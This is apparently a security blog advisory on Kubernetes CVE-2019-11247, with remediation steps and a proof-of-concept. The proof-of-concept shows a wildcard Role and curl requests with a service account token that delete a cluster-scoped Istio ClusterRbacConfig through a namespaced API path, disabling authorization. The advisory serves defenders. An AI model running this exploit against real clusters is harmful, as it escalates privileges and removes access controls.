skip to main content

Aug 5, 2019

How to Remediate Kubernetes Security Vulnerability: CVE-2019-11247

By: Karen Bruner

A new Kubernetes security vulnerability was announced today, along with patch releases for the issue for Kubernetes versions 1.13, 1.14, and 1.15. CVE-2019-11247 discloses a serious vulnerability in the K8s API that could allow users to read, modify or delete cluster-wide custom resources, even if they only have RBAC permissions for namespaced resources.

If your clusters aren’t using Custom Resource Definitions (CRDs), you aren’t affected. But CRDs have become a critical component of many Kubernetes-native projects like Istio, so many users are impacted. This vulnerability also doesn’t affect you if your clusters run without Kubernetes RBAC, but that puts you at an even greater risk than this vulnerability does. We still strongly recommend enabling and using Kubernetes RBAC.

Although CVE-2019-11247 has been assigned a medium-severity CVSS score, it poses an especially serious threat when custom resources are used to manage functionality related to cluster or application security. For example, the Istio service mesh creates dozens of CRDs, both cluster-wide and namespaced, for its configuration.

Remediation Steps

The best way to close this vulnerability is to upgrade all your Kubernetes cluster masters to a patched version. Open-source upstream Kubernetes versions 1.13.9, 1.14.5, or 1.15.2 include this fix. If your Kubernetes clusters are running on a managed platform and version 1.12 or earlier, you will have to check if they have a fix available and how to apply it.

If upgrading immediately is not an option, check all the Roles in your cluster. Make sure none of them have “*” allowed for resources or apiGroups, operating under the best practice of explicitly granting the least amount of privilege.

How It Works

Normally, K8s RBAC Roles can only have permissions for resources in their own namespace. The K8s RBAC API should prevent attempts to allow grants to resources in other namespaces or globally-scoped resources, and to prevent access to actual resources outside a Role’s given permission scope. Cluster-scoped resources should only be accessible from accounts with a ClusterRoleBinding to a ClusterRole with the appropriate resource permissions. These same principles should apply whether the resource is defined in a standard Kubernetes API or as part of a custom resource definition.

The bug covered by CVE-2019-11247 arises from incorrect handling of K8s API calls made for globally-scoped custom resources. If the API endpoint is scoped with a namespace, the permissions are evaluated in the scope of that namespace, even though the resource is global. Therefore, when making authenticated calls to the K8s API server with a service account that has wildcards (“*”) in its Role definition and a RoleBinding in any namespace, by passing that namespace as the scope of the API call, it’s possible to act on cluster-scoped resources.

Exploitation Example

Here’s an example with the Istio ClusterRbacConfig CRD. This custom resource is globally-scoped, meaning it cannot be targeted to a particular Kubernetes namespace and applies to the entire cluster. It is particularly critical from a security standpoint because it enables and sets the default enforcement of Istio’s Authorization system (Istio RBAC) for the entire cluster.

Tests shown are run on a Kubernetes cluster running 1.12.8 and Istio 1.2.3.

apiVersion: 'rbac.istio.io/v1alpha1'
kind: ClusterRbacConfig
metadata:
  name: default
spec:
  # Apply to all namespaces except those explicitly listed below
  mode: 'ON_WITH_EXCLUSION'
  exclusion:
    # Apply to all namespaces except istio-system and kube-system
    namespaces: ['istio-system', 'kube-system']

Now if we have a service account with a single RoleBinding in the default namespace with the following Role specification:

apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
  name: cve-2019-11247-role
  namespace: default
  labels:
    app: cve-2019-11247-test
rules:
  - apiGroups: ['*']
    resources: ['*']
    verbs: ['*']

We can run the following proof-of-concept:

$ kubectl get pods
NAME                                   READY   STATUS    RESTARTS   AGE
cve-2019-11247-test-7b9fc4c9f7-rgd2f   2/2     Running   0          3m44s
helloworld-v1-7b984f4489-9ww5n         2/2     Running   0          3m45s
$ kubectl exec -it cve-2019-11247-test-7b9fc4c9f7-rgd2f -- /bin/sh
Defaulting container name to cve-2019-11247-test.
Use 'kubectl describe pod/cve-2019-11247-test-7b9fc4c9f7-rgd2f -n default' to see all of the containers in this pod.
$ curl -D - http://helloworld.default.svc.cluster.local:5000/hello
HTTP/1.1 403 Forbidden
content-length: 19
content-type: text/plain
date: Mon, 05 Aug 2019 22:01:48 GMT
server: envoy
x-envoy-upstream-service-time: 9

RBAC: access denied

Istio is currently blocking access, because the ClusterRbacConfig requires authorization for access, but it has not been configured between these two services (cve-2019-11247-test and helloworld).

However, with a simple exploit for this vulnerability, this same service account can change that:

# kubectl delete clusterrbacconfigs default
Error from server (Forbidden): clusterrbacconfigs.rbac.istio.io "default" is forbidden: User "system:serviceaccount:default:cve-2019-11247-sa" cannot delete resource "clusterrbacconfigs" in API group "rbac.istio.io" at the cluster scope
# kubectl delete clusterrbacconfigs default --namespace default
warning: deleting cluster-scoped resources, not scoped to the provided namespace
Error from server (Forbidden): clusterrbacconfigs.rbac.istio.io "default" is forbidden: User "system:serviceaccount:default:cve-2019-11247-sa" cannot delete resource "clusterrbacconfigs" in API group "rbac.istio.io" at the cluster scope
# curl -k -H "Authorization: Bearer $(cat /var/run/secrets/kubernetes.io/serviceaccount/token)" \
>   https://$KUBERNETES_PORT_443_TCP_ADDR:$KUBERNETES_SERVICE_PORT_HTTPS/apis/rbac.istio.io/v1alpha1/clusterrbacconfigs \
>   -X GET
{
  "kind": "Status",
  "apiVersion": "v1",
  "metadata": {
  },
  "status": "Failure",
  "message": "clusterrbacconfigs.rbac.istio.io is forbidden: User \"system:serviceaccount:default:cve-2019-11247-sa\" cannot list resource \"clusterrbacconfigs\" in API group \"rbac.istio.io\" at the cluster scope",
  "reason": "Forbidden",
  "details": {
    "group": "rbac.istio.io",
    "kind": "clusterrbacconfigs"
  },
  "code": 403

Those responses are as expected. This service account should not have permission to read or delete any resources that are not in the default namespace. However, if we call the API endpoint for /clusterrbacconfigs as though it were in the default namespace, the K8s API incorrectly allows the requests:

# curl -k -H "Authorization: Bearer $(cat /var/run/secrets/kubernetes.io/serviceaccount/token)" \
>   https://$KUBERNETES_PORT_443_TCP_ADDR:$KUBERNETES_SERVICE_PORT_HTTPS/apis/rbac.istio.io/v1alpha1/namespaces/default/clusterrbacconfigs \
>   -X GET
{
  "apiVersion":"rbac.istio.io/v1alpha1",
  "items":[
    {
      "apiVersion":"rbac.istio.io/v1alpha1",
      "kind":"ClusterRbacConfig",
      "metadata":{
        "annotations":{
          "kubectl.kubernetes.io/last-applied-configuration":"{\"apiVersion\":\"rbac.istio.io/v1alpha1\",\"kind\":\"ClusterRbacConfig\",\"metadata\":{\"annotations\":{},\"name\":\"default\"},\"spec\":{\"exclusion\":{\"namespaces\":[\"istio-system\",\"kube-system\"]},\"mode\":\"ON_WITH_EXCLUSION\"}}\
"
        },
        "creationTimestamp":"2019-08-05T21:57:25Z",
        "generation":1,
        "name":"default",
        "resourceVersion":"25941",
        "selfLink":"/apis/rbac.istio.io/v1alpha1/clusterrbacconfigs/default",
        "uid":"0273b405-b7cc-11e9-b6a0-42010a80005d"
      },
      "spec":{
        "exclusion":{
          "namespaces":[
            "istio-system",
            "kube-system"
          ]
        },
        "mode":"ON_WITH_EXCLUSION"
      }
    }
  ],
  "kind":"ClusterRbacConfigList",
  "metadata":{
    "continue":"",
    "resourceVersion":"29150",
    "selfLink":"/apis/rbac.istio.io/v1alpha1/namespaces/default/clusterrbacconfigs"
  }
}
# curl -k -H "Authorization: Bearer $(cat /var/run/secrets/kubernetes.io/serviceaccount/token)" \
>   https://$KUBERNETES_PORT_443_TCP_ADDR:$KUBERNETES_SERVICE_PORT_HTTPS/apis/rbac.istio.io/v1alpha1/namespaces/default/clusterrbacconfigs \ > -X DELETE
{
  "apiVersion":"rbac.istio.io/v1alpha1",
  "items":[
    {
      "apiVersion":"rbac.istio.io/v1alpha1",
      "kind":"ClusterRbacConfig",
      "metadata":{
        "annotations":{
          "kubectl.kubernetes.io/last-applied-configuration":"{\"apiVersion\":\"rbac.istio.io/v1alpha1\",\"kind\":\"ClusterRbacConfig\",\"metadata\":{\"annotations\":{},\"name\":\"default\"},\"spec\":{\"exclusion\":{\"namespaces\":[\"istio-system\",\"kube-system\"]},\"mode\":\"ON_WITH_EXCLUSION\"}}\
"
        },
        "creationTimestamp":"2019-08-05T21:57:25Z",
        "generation":1,
        "name":"default",
        "resourceVersion":"25941",
        "selfLink":"/apis/rbac.istio.io/v1alpha1/clusterrbacconfigs/default",
        "uid":"0273b405-b7cc-11e9-b6a0-42010a80005d"
      },
      "spec":{
        "exclusion":{
          "namespaces":[
            "istio-system",
            "kube-system"
          ]
        },
        "mode":"ON_WITH_EXCLUSION"
      }
    }
  ],
  "kind":"ClusterRbacConfigList",
  "metadata":{
    "continue":"",
    "resourceVersion":"29180",
    "selfLink":"/apis/rbac.istio.io/v1alpha1/namespaces/default/clusterrbacconfigs"
  }
}

And with the Istio RBAC controls disabled, we can hit our original service endpoint:

# curl -D - http://helloworld.default.svc.cluster.local:5000/hello
HTTP/1.1 200 OK
content-type: text/html; charset=utf-8
content-length: 60
server: envoy
date: Mon, 05 Aug 2019 22:15:02 GMT
x-envoy-upstream-service-time: 169

Hello version: v1, instance: helloworld-v1-7b984f4489-9ww5n

The effects of this Kubernetes vulnerability will be different for each cluster, depending on which Custom Resource Definitions (CRDs) are in use. Upgrade your cluster today or check the remediation steps above to protect yourself, and subscribe to our blog to stay up-to-date on Kubernetes security.